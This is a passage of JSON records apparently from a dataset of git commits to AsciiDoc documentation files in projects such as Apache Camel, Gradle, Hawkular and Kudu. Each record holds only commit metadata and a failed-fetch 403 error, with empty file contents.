docs\n","repos":"gnodet\/camel,adessaigne\/camel,davidkarlsen\/camel,alvinkwekel\/camel,CodeSmell\/camel,apache\/camel,DariusX\/camel,mcollovati\/camel,sverkera\/camel,objectiser\/camel,mcollovati\/camel,ullgren\/camel,zregvart\/camel,tadayosi\/camel,sverkera\/camel,pmoerenhout\/camel,nicolaferraro\/camel,adessaigne\/camel,pax95\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,jamesnetherton\/camel,anoordover\/camel,onders86\/camel,alvinkwekel\/camel,Fabryprog\/camel,tdiesler\/camel,pax95\/camel,davidkarlsen\/camel,anoordover\/camel,punkhorn\/camel-upstream,objectiser\/camel,nicolaferraro\/camel,objectiser\/camel,mcollovati\/camel,adessaigne\/camel,anoordover\/camel,kevinearls\/camel,tdiesler\/camel,cunningt\/camel,apache\/camel,onders86\/camel,gnodet\/camel,christophd\/camel,pmoerenhout\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,cunningt\/camel,jamesnetherton\/camel,anoordover\/camel,pax95\/camel,ullgren\/camel,tadayosi\/camel,tadayosi\/camel,Fabryprog\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,christophd\/camel,DariusX\/camel,apache\/camel,jamesnetherton\/camel,apache\/camel,anoordover\/camel,tdiesler\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,pax95\/camel,onders86\/camel,Fabryprog\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,gnodet\/camel,cunningt\/camel,cunningt\/camel,pmoerenhout\/camel,Fabryprog\/camel,sverkera\/camel,cunningt\/camel,christophd\/camel,sverkera\/camel,zregvart\/camel,nikhilvibhav\/camel,tdiesler\/camel,jamesnetherton\/camel,kevinearls\/camel,kevinearls\/camel,davidkarlsen\/camel,alvinkwekel\/camel,tdiesler\/camel,gnodet\/camel,anoordover\/camel,kevinearls\/camel,davidkarlsen\/camel,ullgren\/camel,CodeSmell\/camel,sverkera\/camel,adessaigne\/camel,nikhilvibhav\/camel,gnodet\/camel,punkhorn\/camel-upstream,adessaigne\/camel,jamesnetherton\/camel,sverkera\/camel,onders86\/camel,punkhorn\/camel-upstream,tadayosi\/camel,pmoerenhout\/camel,CodeSmell\/camel,CodeSmell\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,objectiser\/camel,apache\/camel,kevinearls\/camel,christophd\/camel,jamesnetherton\/camel,kevinearls\/camel,onders86\/camel,DariusX\/camel,apache\/camel,mcollovati\/camel,punkhorn\/camel-upstream,pax95\/camel,zregvart\/camel,onders86\/camel,zregvart\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2190-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2190-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7551a8cd52bd1ceaf698c447e19430de368e915f","subject":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","message":"Update 2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_file":"_posts\/2016-04-08-Es-mas-facil-con-un-C-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f3cd1b8ffbe78014c2789cfab6f4cf4cf849910","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de8416ff727f7421afb50d81a86711ab4a6e844a","subject":"Lazy configuration user guide chapter","message":"Lazy configuration user guide chapter\n","repos":"robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,lsmaira\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,lsmaira\/gradle,lsmaira\/gradle,blindpirate\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,lsmaira\/gradle,gradle\/gradle,lsmaira\/gradle,blindpirate\/gradle,gradle\/gradle,lsmaira\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,lsmaira\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,lsmaira\/gradle,blindpirate\/gradle,lsmaira\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/lazyConfiguration.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/lazyConfiguration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robinverduijn\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7e8425e765cca7e624ed020c98be1ee9094ff47","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fbfd001482bcbe26ac34afae7cdbc1d6a9db508","subject":"Update 2017-07-07-release-ml-utils.adoc","message":"Update 2017-07-07-release-ml-utils.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ff80e3b25bcb81d2e8ef0dac3b223ce28dab36","subject":"y2b create post PlayStation Vita Remote Play Demo","message":"y2b create post PlayStation Vita Remote Play Demo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-28-PlayStation-Vita-Remote-Play-Demo.adoc","new_file":"_posts\/2011-12-28-PlayStation-Vita-Remote-Play-Demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8064d9a6c1f1c785ace986161ae69156a473afe","subject":"Update 2017-02-07-Review-Git-Github-para-Iniciantes.adoc","message":"Update 2017-02-07-Review-Git-Github-para-Iniciantes.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2017-02-07-Review-Git-Github-para-Iniciantes.adoc","new_file":"_posts\/2017-02-07-Review-Git-Github-para-Iniciantes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32397038bc83444fa9bd6e8481f83a54c148e5d6","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da39ce5fc57f046ded21f6aa22ae995708275854","subject":"Update 2010-01-26-O-Google-e-o-TOS.adoc","message":"Update 2010-01-26-O-Google-e-o-TOS.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2010-01-26-O-Google-e-o-TOS.adoc","new_file":"_posts\/2010-01-26-O-Google-e-o-TOS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95d1d3031223aed264dd6b4d23e379676a466641","subject":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-baggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8c0311f7f8b6de4f200a384445c6515fe5f7d74","subject":"y2b create post Bend Proof iPhone 6 Plus Case?","message":"y2b create post Bend Proof iPhone 6 Plus Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-13-Bend-Proof-iPhone-6-Plus-Case.adoc","new_file":"_posts\/2015-03-13-Bend-Proof-iPhone-6-Plus-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9171f983b624de8eb31f5ed96aa4c6133f87bf5","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e62d48b90603ebc0f2dff43c2cd6703e18421312","subject":"Add 'Feature Request' document template (#36)","message":"Add 'Feature Request' document template (#36)\n\n","repos":"mbbx6spp\/styleguides","old_file":"docs\/FEATURE_REQUEST.adoc","new_file":"docs\/FEATURE_REQUEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbbx6spp\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee9c6486a04ca8a75180552e05d95efbf5eb32be","subject":"2016-07-26-Sailing.adoc","message":"2016-07-26-Sailing.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-26-Sailing.adoc","new_file":"_posts\/2016-07-26-Sailing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"307656ec568d3ec6584581f1c2d1eb4cea9ccc70","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1402ac21484de93a652ec0663572b194f3ec17b5","subject":"Hawkular Metrics 0.9.0 - Release Announcement","message":"Hawkular Metrics 0.9.0 - Release Announcement\n","repos":"lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/10\/30\/hawkular-metrics-0.8.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/10\/30\/hawkular-metrics-0.8.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df17319e8084f3b8072065b122a0f728f9844890","subject":"Job: #11367","message":"Job: #11367\n\nIntroduce doc\n","repos":"leviathan747\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11367_wasl_mm\/11367_wasl_mm.int.adoc","new_file":"doc-bridgepoint\/notes\/11367_wasl_mm\/11367_wasl_mm.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8826c7f6e1987815188358df8df0c5d9e04af2bd","subject":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","message":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d769e0e5c4aba67d398116c4751b2c5aefa0c77","subject":"As the tip now spans multiple blocks we need to mark start and end.","message":"As the tip now spans multiple blocks we need to mark start and end.\n","repos":"lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32fdd3681bd2e45b284ee6674db1ec3742f906ff","subject":"Update 2015-09-18-Credits.adoc","message":"Update 2015-09-18-Credits.adoc","repos":"NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io","old_file":"_posts\/2015-09-18-Credits.adoc","new_file":"_posts\/2015-09-18-Credits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NadineLaCuisine\/NadineLaCuisine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32f82dc8fc766e047170c1b9f2f6e52e0a50409d","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8551c9df0c18c32b2453362921f4a4a4a8ac62cd","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce42670c7c694c88b94a07ce142588184494f766","subject":"[DOCS] Build Elasticsearch Reference from elasticsearch repo (#28469)","message":"[DOCS] Build Elasticsearch Reference from elasticsearch repo (#28469)\n\n","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,vroyer\/elasticassandra","old_file":"docs\/reference\/index.x.asciidoc","new_file":"docs\/reference\/index.x.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vroyer\/elasticassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2fbb1e14615b8960c9780c5f25d1678cd9fa1d5","subject":"\/toycode: explain what the gist is linking to, rather than paste the raw URL","message":"\/toycode: explain what the gist is linking to, rather than paste the raw URL\n","repos":"jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com,jzacsh\/jzacsh.github.com","old_file":"content\/toycode.adoc","new_file":"content\/toycode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/jzacsh.github.com.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"395783634b037f5a32266fc1209d047b3b208c2e","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9846ee06f1eab445f07b8a2a6375a170b402213a","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f6c5607b61bb684b638fa00292d6a0dccff8c12","subject":"Update 2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","message":"Update 2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","new_file":"_posts\/2016-05-03-Episode-55-Education-is-Important-But-Pinball-is-Importanter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"682c664d54111dc923c5960779231a93e3bf098f","subject":"Fix wrong code blocks in the document","message":"Fix wrong code blocks in the document\n\nChange-Id: I93c27c8f7e4dbe198478cbe2f80eed037171eac5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2144\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63bf6f129e9383519646563721933771a7e7199e","subject":"Minor fixes to the Impala doc","message":"Minor fixes to the Impala doc\n\nAdded a NOTE for a thing that's easy to miss and fixed the query to check if everything is setup\ncorrectly.\n\nChange-Id: I4c2a0c60e9d41c8b079527aabbcd46002f647de0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1056\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56cc69226fa6a053e6f038ac2b1d12b6fc533e37","subject":"[doc] KUDU-1630 impala_tables.html link is showing as text and not actual link","message":"[doc] KUDU-1630 impala_tables.html link is showing as text and not actual link\n\nMissing space before the hyperlink was causing this issue.\nHyperlinked \"Impala documentation\" text to appropriate impala link.\n\nComplete text being:\nSee the Impala documentation for more information about internal and external tables.\n\nPlease check the resultant html here:\nhttps:\/\/github.com\/ninadshr\/sample_repo\/blob\/master\/kudu_impala_integration.html\n\nChange-Id: I25c1251b312586b38a558eb3365f60f7ff3a7ba0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4483\nTested-by: Kudu Jenkins\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Dan Burkert 